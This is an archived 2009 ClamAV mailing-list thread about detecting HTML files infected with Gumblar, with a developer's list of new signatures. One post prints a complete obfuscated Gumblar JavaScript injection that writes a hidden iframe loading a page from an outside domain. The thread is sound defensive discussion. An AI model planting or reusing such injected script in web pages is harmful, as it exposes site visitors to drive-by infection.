Login | Register For Free | Help
Search for: (Advanced)

Mailing List Archive: ClamAV: users

Finding html and related files infected with Gumblar

  

 
ClamAV users RSS feed   Index | Next | Previous | View Threaded


peter.abraham at dynamicnet

Jul 20, 2009, 10:00 AM

Post #1 of 6 (1889 views)
Permalink
Finding html and related files infected with Gumblar
Greetings:

At present, Clam Anti-virus 0.95.2 when using ClamScan with --infected does
not find html and related files that have been infected with Grumblar.

When will such detection be available in Clam Anti-virus and Clamscan?

If it is present now, what changes must I make to allow for Clam Anti-virus
to find such infections?

I do have "DetectPUA yes" in clamd.conf

Thank you.

________________________________________________
Peter M. Abraham



_______________________________________________
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


edwintorok at gmail

Jul 20, 2009, 2:28 PM

Post #2 of 6 (1812 views)
Permalink
Re: Finding html and related files infected with Gumblar [In reply to]
On 2009-07-20 20:00, Peter M. Abraham wrote:
> Greetings:
>
> At present, Clam Anti-virus 0.95.2 when using ClamScan with --infected does
> not find html and related files that have been infected with Grumblar.
>
> When will such detection be available in Clam Anti-virus and Clamscan?
>
> If it is present now, what changes must I make to allow for Clam Anti-virus
> to find such infections?
>
> I do have "DetectPUA yes" in clamd.conf

Hi,

I just published some signatures for Gumblar, more will come later:
ClamAV database updated (20 Jul 2009 17-23 -0400): daily.cvd
Version: 9592

Submission-ID: 8833111
Sender: Virus Total
Added: Trojan.JS.Gumblar-8
Virus name alias: Trojan.Script.129045 (Bitdefender)

Submission-ID: 8869676
Sender: esbjorn krantzen
Added: Trojan.JS.Gumblar
Added: PUA.Script.Packed-4

Submission-ID: 8886181
Sender: yoshiaki ito_20090616
Added: Trojan.JS.Gumblar-1
Added: PUA.Script.Packed-5
Added: Exploit.PDF-73

Submission-ID: 8904202
Sender: Virus Total
Added: Trojan.JS.Gumblar-2
Virus name alias: Trojan.Script.139377 (Bitdefender)

Submission-ID: 9276623
Sender: Virus Total
Added: Trojan.JS.Gumblar-5
Virus name alias: Trojan.Script.173034 (Bitdefender)

Submission-ID: 9419622
Sender: Virus Total
Added: Trojan.JS.Gumblar-7

Submission-ID: 9435021
Sender: Virus Total
Added: Trojan.JS.Gumblar-6

Submission-ID: 9447670
Sender: Virus Total
Added: Trojan.JS.Gumblar-4

Submission-ID: 9452548
Sender: Virus Total
Added: Trojan.JS.Gumblar-3

Best regards,
--Edwin
_______________________________________________
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


peter.abraham at dynamicnet

Jul 21, 2009, 7:34 AM

Post #3 of 6 (1800 views)
Permalink
Re: Finding html and related files infected with Gumblar [In reply to]
Greetings Edwin:

I just created a HTML file with an infection on purpose to test.

clamscan -i -r test.html found no infections.

Here's what I put in the test file:



<script type="text/javascript">var kPvOkYUlTEBvLmAPjYUP =
"nd60nd105nd102nd114nd97nd109nd101nd32nd119nd105nd100nd116nd104nd61nd34nd52n
d56nd48nd34nd32nd104nd101nd105nd103nd104nd116nd61nd34nd54nd48nd34nd32nd115nd
114nd99nd61nd34nd104nd116nd116nd112nd58nd47nd47nd104nd105nd116nd45nd115nd101
nd110nd100nd101nd114nd115nd46nd99nd110nd47nd102nd105nd110nd100nd47nd105nd110
nd46nd99nd103nd105nd63nd49nd50nd34nd32nd115nd116nd121nd108nd101nd61nd34nd98n
d111nd114nd100nd101nd114nd58nd48nd112nd120nd59nd32nd112nd111nd115nd105nd116n
d105nd111nd110nd58nd114nd101nd108nd97nd116nd105nd118nd101nd59nd32nd116nd111n
d112nd58nd48nd112nd120nd59nd32nd108nd101nd102nd116nd58nd45nd53nd48nd48nd112n
d120nd59nd32nd111nd112nd97nd99nd105nd116nd121nd58nd48nd59nd32nd102nd105nd108
nd116nd101nd114nd58nd112nd114nd111nd103nd105nd100nd58nd68nd88nd73nd109nd97nd
103nd101nd84nd114nd97nd110nd115nd102nd111nd114nd109nd46nd77nd105nd99nd114nd1
11nd115nd111nd102nd116nd46nd65nd108nd112nd104nd97nd40nd111nd112nd97nd99nd105
nd116nd121nd61nd48nd41nd59nd32nd45nd109nd111nd122nd45nd111nd112nd97nd99nd105
nd116nd121nd58nd48nd34nd62nd60nd47nd105nd102nd114nd97nd109nd101nd62";var
LQweQmnfGaTqpPFaoZLH = kPvOkYUlTEBvLmAPjYUP.split("nd");var
dNCoADEkcYAnpwSFjFkp = "";for (var fDfVTkvHKHOnVRcVUgGw=1;
fDfVTkvHKHOnVRcVUgGw<LQweQmnfGaTqpPFaoZLH.length;
fDfVTkvHKHOnVRcVUgGw++){dNCoADEkcYAnpwSFjFkp+=String.fromCharCode(LQweQmnfGa
TqpPFaoZLH[fDfVTkvHKHOnVRcVUgGw]);}document.write(dNCoADEkcYAnpwSFjFkp)</scr



Please advise.

Thank you.

________________________________________________
Peter M. Abraham


> Message: 2
> Date: Tue, 21 Jul 2009 00:28:08 +0300
> From: T?r?k Edwin <edwintorok [at] gmail>
> Subject: Re: [Clamav-users] Finding html and related files infected
> with Gumblar
> To: ClamAV users ML <clamav-users [at] lists>
> Message-ID: <4A64E168.90908 [at] gmail>
> Content-Type: text/plain; charset=ISO-8859-1
>
>
> Hi,
>
> I just published some signatures for Gumblar, more will come later:
> ClamAV database updated (20 Jul 2009 17-23 -0400): daily.cvd
> Version: 9592
>
> Submission-ID: 8833111
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-8
> Virus name alias: Trojan.Script.129045 (Bitdefender)
>
> Submission-ID: 8869676
> Sender: esbjorn krantzen
> Added: Trojan.JS.Gumblar
> Added: PUA.Script.Packed-4
>
> Submission-ID: 8886181
> Sender: yoshiaki ito_20090616
> Added: Trojan.JS.Gumblar-1
> Added: PUA.Script.Packed-5
> Added: Exploit.PDF-73
>
> Submission-ID: 8904202
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-2
> Virus name alias: Trojan.Script.139377 (Bitdefender)
>
> Submission-ID: 9276623
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-5
> Virus name alias: Trojan.Script.173034 (Bitdefender)
>
> Submission-ID: 9419622
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-7
>
> Submission-ID: 9435021
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-6
>
> Submission-ID: 9447670
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-4
>
> Submission-ID: 9452548
> Sender: Virus Total
> Added: Trojan.JS.Gumblar-3
>
> Best regards,
> --Edwin

_______________________________________________
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


edwintorok at gmail

Jul 21, 2009, 7:39 AM

Post #4 of 6 (1797 views)
Permalink
Re: Finding html and related files infected with Gumblar [In reply to]
On 2009-07-21 17:34, Peter M. Abraham wrote:
> Greetings Edwin:
>
> I just created a HTML file with an infection on purpose to test.
>
> clamscan -i -r test.html found no infections.
>
> Here's what I put in the test file:
>
>
>

The proper place to submit samples is clamav.net/sendvirus, and NOT this
mailing list.

See rules at:
http://lists.clamav.net/mailman/listinfo/clamav-users

DO NOT SEND VIRUS SAMPLES HERE!!! NOT EVEN LINKS TO VIRUSES!!! Send them
through our web interface at http://www.clamav.net/sendvirus

Best regards,
--Edwin
_______________________________________________
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


rafael at bolso

Jul 21, 2009, 8:54 AM

Post #5 of 6 (1792 views)
Permalink
Re: Finding html and related files infected with Gumblar [In reply to]
Peter M. Abraham wrote:
> Greetings Edwin:
>
> I just created a HTML file with an infection on purpose to test.
>
> clamscan -i -r test.html found no infections.
>
> Here's what I put in the test file:

Bitdefender detects it as Trojan.Script.177381
_______________________________________________
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


peter.abraham at dynamicnet

Jul 22, 2009, 4:54 AM

Post #6 of 6 (1790 views)
Permalink
Re: Finding html and related files infected with Gumblar [In reply to]
Greetings:

Does Clam Anti-Virus have this signature yet?

Thank you!


________________________________________________
Peter M. Abraham

> Message: 4
> Date: Tue, 21 Jul 2009 12:54:38 -0300
> From: rafa <rafael [at] bolso>
> Subject: Re: [Clamav-users] Finding html and related files infected
> with Gumblar
> To: ClamAV users ML <clamav-users [at] lists>
> Message-ID: <20090721155439.25ECC2584EC [at] farallon>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> Peter M. Abraham wrote:
> > Greetings Edwin:
> >
> > I just created a HTML file with an infection on purpose to test.
> >
> > clamscan -i -r test.html found no infections.
> >
> > Here's what I put in the test file:
>
> Bitdefender detects it as Trojan.Script.177381

_______________________________________________
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

ClamAV users RSS feed   Index | Next | Previous | View Threaded
 
 


Interested in having your list archived? Contact Gossamer Threads
 
  Web Applications & Managed Hosting Powered by Gossamer Threads Inc.